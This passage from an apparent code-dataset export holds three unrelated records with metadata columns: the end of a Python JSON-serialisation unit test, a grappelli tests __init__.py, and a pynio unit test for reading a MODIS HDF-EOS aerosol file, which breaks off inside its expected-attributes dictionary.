self.assertEqual(struct2.f8["20"], None)
self.assertEqual(len(struct2.f9), 2)
self.assertEqual(struct2.f9["10"].id, 48)
self.assertEqual(struct2.f9["20"].id, 65)
self.assertEqual(len(struct2.f10), 2)
self.assertEqual(struct2.f10["10"].id, 48)
self.assertEqual(struct2.f10["20"], None)
def test_serialization_json_struct_hash(self):
# Define a source JSON string
json = r'{"f1":{"10":48,"20":65},"f2":{"10":97,"20":null},"f3":{"10":"MDAw","20":"QUFB"},"f4":{"10":"YWFh","20":null},"f5":{"10":1,"20":2},"f6":{"10":1,"20":null},"f7":{"10":3,"20":7},"f8":{"10":3,"20":null},"f9":{"10":{"id":48,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543146381450913000,"f36":"00000000-0000-0000-0000-000000000000","f37":"ba8885d2-f0a7-11e8-81fa-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}},"20":{"id":65,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543146381452825000,"f36":"00000000-0000-0000-0000-000000000000","f37":"ba88ced4-f0a7-11e8-81fa-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}}},"f10":{"10":{"id":48,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543146381450913000,"f36":"00000000-0000-0000-0000-000000000000","f37":"ba8885d2-f0a7-11e8-81fa-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}},"20":null}}'
# Create a new struct from the source JSON string
struct1 = test.StructHash.from_json(json)
# Serialize the struct to the JSON string
json = struct1.to_json()
# Check the serialized JSON size
self.assertGreater(len(json), 0)
# Deserialize the struct from the JSON string
struct2 = test.StructHash.from_json(json)
self.assertEqual(len(struct2.f1), 2)
self.assertEqual(struct2.f1["10"], 48)
self.assertEqual(struct2.f1["20"], 65)
self.assertEqual(len(struct2.f2), 2)
self.assertEqual(struct2.f2["10"], 97)
self.assertEqual(struct2.f2["20"], None)
self.assertEqual(len(struct2.f3), 2)
self.assertEqual(len(struct2.f3["10"]), 3)
self.assertEqual(len(struct2.f3["20"]), 3)
self.assertEqual(len(struct2.f4), 2)
self.assertEqual(len(struct2.f4["10"]), 3)
self.assertEqual(struct2.f4["20"], None)
self.assertEqual(len(struct2.f5), 2)
self.assertEqual(struct2.f5["10"], test.EnumSimple.ENUM_VALUE_1)
self.assertEqual(struct2.f5["20"], test.EnumSimple.ENUM_VALUE_2)
self.assertEqual(len(struct2.f6), 2)
self.assertEqual(struct2.f6["10"], test.EnumSimple.ENUM_VALUE_1)
self.assertEqual(struct2.f6["20"], None)
self.assertEqual(len(struct2.f7), 2)
self.assertEqual(struct2.f7["10"], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2)
self.assertEqual(struct2.f7["20"], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2 | test.FlagsSimple.FLAG_VALUE_3)
self.assertEqual(len(struct2.f8), 2)
self.assertEqual(struct2.f8["10"], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2)
self.assertEqual(struct2.f8["20"], None)
self.assertEqual(len(struct2.f9), 2)
self.assertEqual(struct2.f9["10"].id, 48)
self.assertEqual(struct2.f9["20"].id, 65)
self.assertEqual(len(struct2.f10), 2)
self.assertEqual(struct2.f10["10"].id, 48)
self.assertEqual(struct2.f10["20"], None)
| 69.289157
| 4,381
| 0.65706
| 9,482
| 69,012
| 4.76081
| 0.036807
| 0.233596
| 0.289487
| 0.05702
| 0.946657
| 0.917771
| 0.910084
| 0.893602
| 0.891387
| 0.889881
| 0
| 0.221156
| 0.140439
| 69,012
| 995
| 4,382
| 69.358794
| 0.539835
| 0.030473
| 0
| 0.858633
| 0
| 0.011587
| 0.33448
| 0.328063
| 0
| 0
| 0.004128
| 0
| 0.922364
| 1
| 0.012746
| false
| 0
| 0.008111
| 0
| 0.022016
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
d1bd081f05c2bdd6057d4c73879864de86744445
| 105
|
py
|
Python
|
static/tests/__init__.py
|
jared-wallace/jared-wallace.com
|
af58635d18f394906b6a0125eb4573f89546d7d5
|
[
"WTFPL"
] | null | null | null |
static/tests/__init__.py
|
jared-wallace/jared-wallace.com
|
af58635d18f394906b6a0125eb4573f89546d7d5
|
[
"WTFPL"
] | null | null | null |
static/tests/__init__.py
|
jared-wallace/jared-wallace.com
|
af58635d18f394906b6a0125eb4573f89546d7d5
|
[
"WTFPL"
] | null | null | null |
from grappelli.tests.test_related import RelatedTests
from grappelli.tests.test_switch import SwitchTests
| 52.5
| 53
| 0.895238
| 14
| 105
| 6.571429
| 0.642857
| 0.282609
| 0.391304
| 0.478261
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066667
| 105
| 2
| 54
| 52.5
| 0.938776
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d1d3b38f60f369d00e32a442fd5a53ae17fc9d9c
| 69,100
|
py
|
Python
|
test/test_hdfeos.py
|
briandobbins/pynio
|
1dd5fc0fc133f2b8d329ae68929bd3c6c1c5fa7c
|
[
"Apache-2.0"
] | null | null | null |
test/test_hdfeos.py
|
briandobbins/pynio
|
1dd5fc0fc133f2b8d329ae68929bd3c6c1c5fa7c
|
[
"Apache-2.0"
] | null | null | null |
test/test_hdfeos.py
|
briandobbins/pynio
|
1dd5fc0fc133f2b8d329ae68929bd3c6c1c5fa7c
|
[
"Apache-2.0"
] | null | null | null |
import Nio
import numpy as np
import numpy.testing as nt
import os
import unittest as ut
file_to_test = '../ncarg/data/hdfeos/MOD04_L2.A2001066.0000.004.2003078090622.hdfeos'
class Test(ut.TestCase):
def setUp(self):
self.f = Nio.open_file(os.path.realpath(os.path.join(os.path.dirname(__file__), file_to_test)))
def test_hdfeos_variables(self):
nt.assert_equal(set(self.f.variables.keys()), set(file_variables))
def test_hdfeos_attributes(self):
nt.assert_equal(self.f.attributes, file_attributes)
def test_hdfeos_dimensions(self):
nt.assert_equal(self.f.dimensions, file_dimensions)
def test_hdfeos_var_shapes(self):
for var in self.f.variables.keys():
v = self.f.variables[var]
nt.assert_equal(v.shape, var_shapes[var])
def test_hdfeos_var_attributes(self):
for var in self.f.variables.keys():
v = self.f.variables[var]
nt.assert_equal(v.attributes, var_attributes[var])
def test_hdfeos_var_dimensions(self):
for var in self.f.variables.keys():
v = self.f.variables[var]
nt.assert_equal(v.dimensions, var_dimensions[var])
def test_hdfeos_var_coordinates(self):
for var in self.f.variables.keys():
v = self.f.variables[var]
nt.assert_equal(get_coord_dims(v), var_coordinates[var])
def test_hdfeos_var_values(self):
for var in var_values.keys():
v = self.f.variables[var]
val = v.get_value()
if np.ma.is_masked(val.min()) or np.ma.is_masked(var_values[var][0]):
nt.assert_equal(np.ma.is_masked(val.min()), np.ma.is_masked(var_values[var][0]))
else:
nt.assert_almost_equal(val.min(), var_values[var][0])
if np.ma.is_masked(val.max()) or np.ma.is_masked(var_values[var][1]):
nt.assert_equal(np.ma.is_masked(val.max()), np.ma.is_masked(var_values[var][1]))
else:
nt.assert_almost_equal(val.max(), var_values[var][1])
if np.ma.is_masked(val.mean()) or np.ma.is_masked(var_values[var][2]):
nt.assert_equal(np.ma.is_masked(val.mean()), np.ma.is_masked(var_values[var][2]))
else:
nt.assert_almost_equal(val.mean(), var_values[var][2])
nt.assert_almost_equal(np.ma.count_masked(val), var_values[var][3])
file_attributes = {}
file_dimensions = {'Cell_Along_Swath_mod04': 203, 'Cell_Across_Swath_mod04': 135, 'Solution_1_Land_mod04': 2, 'Solution_2_Land_mod04': 3, 'Solution_3_Land_mod04': 3, 'Solution_Ocean_mod04': 2, 'Solution_Index_mod04': 9, 'MODIS_Band_Land_mod04': 5, 'MODIS_Band_Ocean_mod04': 7, 'QA_Byte_Land_mod04': 5, 'QA_Byte_Ocean_mod04': 5}
file_variables = ['MODIS_Band_Ocean_mod04', 'MODIS_Band_Land_mod04', 'Solution_Index_mod04', 'Solution_Ocean_mod04', 'Solution_3_Land_mod04', 'Solution_2_Land_mod04', 'Solution_1_Land_mod04', 'Quality_Assurance_Ocean_mod04', 'STD_Reflectance_Ocean_mod04', 'Mean_Reflectance_Ocean_mod04', 'Number_Pixels_Used_Ocean_mod04', 'Cloud_Fraction_Ocean_mod04', 'Optical_Depth_by_models_ocean_mod04', 'Optical_Depth_Ratio_Small_Ocean_0_86micron_mod04', 'Least_Squares_Error_Ocean_mod04', 'Transmitted_Flux_Average_Ocean_mod04', 'Transmitted_Flux_Best_Ocean_mod04', 'Reflected_Flux_Average_Ocean_mod04', 'Reflected_Flux_Best_Ocean_mod04', 'Angstrom_Exponent_2_Ocean_mod04', 'Angstrom_Exponent_1_Ocean_mod04', 'Backscattering_Ratio_Average_Ocean_mod04', 'Backscattering_Ratio_Best_Ocean_mod04', 'Asymmetry_Factor_Average_Ocean_mod04', 'Asymmetry_Factor_Best_Ocean_mod04', 'Cloud_Condensation_Nuclei_Ocean_mod04', 'Effective_Radius_Ocean_mod04', 'Mass_Concentration_Ocean_mod04', 'Optical_Depth_Large_Average_Ocean_mod04', 'Optical_Depth_Large_Best_Ocean_mod04', 'Optical_Depth_Small_Average_Ocean_mod04', 'Optical_Depth_Small_Best_Ocean_mod04', 'Effective_Optical_Depth_Average_Ocean_mod04', 'Effective_Optical_Depth_Best_Ocean_mod04', 'Solution_Index_Ocean_Large_mod04', 'Solution_Index_Ocean_Small_mod04', 'Quality_Assurance_Crit_Ref_Land_mod04', 'Quality_Assurance_Land_mod04', 'STD_Reflectance_Land_mod04', 'Mean_Reflectance_Land_mod04', 'Number_Pixels_Percentile_Land_mod04', 'Optical_Depth_Ratio_Small_Land_mod04', 'Cloud_Fraction_Land_mod04', 'Transmitted_Flux_Land_mod04', 'Reflected_Flux_Land_mod04', 'Angstrom_Exponent_Land_mod04', 'Mass_Concentration_Land_mod04', 'Estimated_Uncertainty_Land_mod04', 'Corrected_Optical_Depth_Land_mod04', 'Continental_Optical_Depth_Land_mod04', 'Aerosol_Type_Land_mod04', 'QualityWeight_Critical_Reflectance_Land_mod04', 'QualityWeight_Path_Radiance_Land_mod04', 'Error_Critical_Reflectance_Land_mod04', 'Critical_Reflectance_Land_mod04', 'Error_Path_Radiance_Land_mod04', 'Path_Radiance_Land_mod04', 'Standard_Deviation_Reflectance_Land_All_mod04', 'Mean_Reflectance_Land_All_mod04', 'Reflected_Flux_Land_And_Ocean_mod04', 'Optical_Depth_Ratio_Small_Land_And_Ocean_mod04', 'Optical_Depth_Land_And_Ocean_mod04', 'Scattering_Angle_mod04', 'Cloud_Mask_QA_mod04', 'Sensor_Azimuth_mod04', 'Sensor_Zenith_mod04', 'Solar_Azimuth_mod04', 'Solar_Zenith_mod04', 'Scan_Start_Time_mod04', 'Latitude_mod04', 'Longitude_mod04']
var_attributes = {'MODIS_Band_Ocean_mod04': {'hdfeos_name': 'MODIS_Band_Ocean'},
'MODIS_Band_Land_mod04': {'hdfeos_name': 'MODIS_Band_Land'},
'Solution_Index_mod04': {'hdfeos_name': 'Solution_Index'},
'Solution_Ocean_mod04': {'hdfeos_name': 'Solution_Ocean'},
'Solution_3_Land_mod04': {'hdfeos_name': 'Solution_3_Land'},
'Solution_2_Land_mod04': {'hdfeos_name': 'Solution_2_Land'},
'Solution_1_Land_mod04': {'hdfeos_name': 'Solution_1_Land'},
'Quality_Assurance_Ocean_mod04': {'hdfeos_name': 'Quality_Assurance_Ocean', '_FillValue': np.array([0], dtype=np.int8), 'valid_range': np.array([ 0, -1], dtype=np.int8), 'Geolocation_Pointer': 'Internal geolocation arrays', 'description': '(see MODIS atmosphere QA plan for details)', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'None', 'long_name': 'Run time QA flags'},
'STD_Reflectance_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'STD_Reflectance_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 20000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([9.999999747378751e-05]), 'units': 'None', 'long_name': 'Standard devaition of reflectances at 7 bands'},
'Mean_Reflectance_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Mean_Reflectance_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 10000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([9.999999747378751e-05]), 'units': 'None', 'long_name': 'Mean reflectances at 7 bands'},
'Number_Pixels_Used_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Number_Pixels_Used_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 1, 400], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'None', 'long_name': 'Number of Pixels used for 0.55 micron'},
'Cloud_Fraction_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Cloud_Fraction_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 100], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'None', 'long_name': 'Cloud_Fraction in percentage'},
'Optical_Depth_by_models_ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Optical_Depth_by_models_ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 5000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'optical depth for small and large modes placed in model index'},
'Optical_Depth_Ratio_Small_Ocean_0_86micron_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Optical_Depth_Ratio_Small_Ocean_0.86micron', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 1000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Ratio of small mode optical depth at 0.86 micron'},
'Least_Squares_Error_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Least_Squares_Error_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 1000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Least square error estimated'},
'Transmitted_Flux_Average_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Transmitted_Flux_Average_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 1000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Normalized Transmitted_flux at 7 bands of average solution'},
'Transmitted_Flux_Best_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Transmitted_Flux_Best_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 1000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Normalized Transmitted_flux at 7 bands of best solution'},
'Reflected_Flux_Average_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Reflected_Flux_Average_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 1000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Normalized reflected_flux at 7 bands for average solution'},
'Reflected_Flux_Best_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Reflected_Flux_Best_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 1000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Normalized reflected_flux at 7 bands for best solution'},
'Angstrom_Exponent_2_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Angstrom_Exponent_2_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([-500, 3000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Angstrom exponent for 0.865 and 2.130 micron'},
'Angstrom_Exponent_1_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Angstrom_Exponent_1_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([-500, 3000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Angstrom Exponent for 0.550 and 0.865 miron'},
'Backscattering_Ratio_Average_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Backscattering_Ratio_Average_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 3000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Backscattering ratio at 7 bands for average solution'},
'Backscattering_Ratio_Best_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Backscattering_Ratio_Best_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 3000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Backscattering ratio at 7 bands for best solution'},
'Asymmetry_Factor_Average_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Asymmetry_Factor_Average_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 3000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Asymmetry_Factor at 7 bands for average solution'},
'Asymmetry_Factor_Best_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Asymmetry_Factor_Best_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 3000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Asymmetry_Factor at 7 bands for best solution'},
'Cloud_Condensation_Nuclei_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Cloud_Condensation_Nuclei_Ocean', '_FillValue': np.array([-999.], dtype=np.float32), 'valid_range': np.array([0.e+00, 1.e+11], dtype=np.float32), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'CCN/cm^2', 'long_name': 'Column number of CCN at 0.55 micron of both solutions'},
'Effective_Radius_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Effective_Radius_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 5000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'micron', 'long_name': 'Effective_Radius at 0.55 micron of both solutions'},
'Mass_Concentration_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Mass_Concentration_Ocean', '_FillValue': np.array([-999.], dtype=np.float32), 'valid_range': np.array([ 0., 1000.], dtype=np.float32), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': '1.0e-6g/cm^2', 'long_name': 'Mass_Concentration for best and average solutions'},
'Optical_Depth_Large_Average_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Optical_Depth_Large_Average_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 5000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'AOT at 7 bands for large mode of average solution'},
'Optical_Depth_Large_Best_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Optical_Depth_Large_Best_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 5000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'AOT at 7 bands for large mode of best solution'},
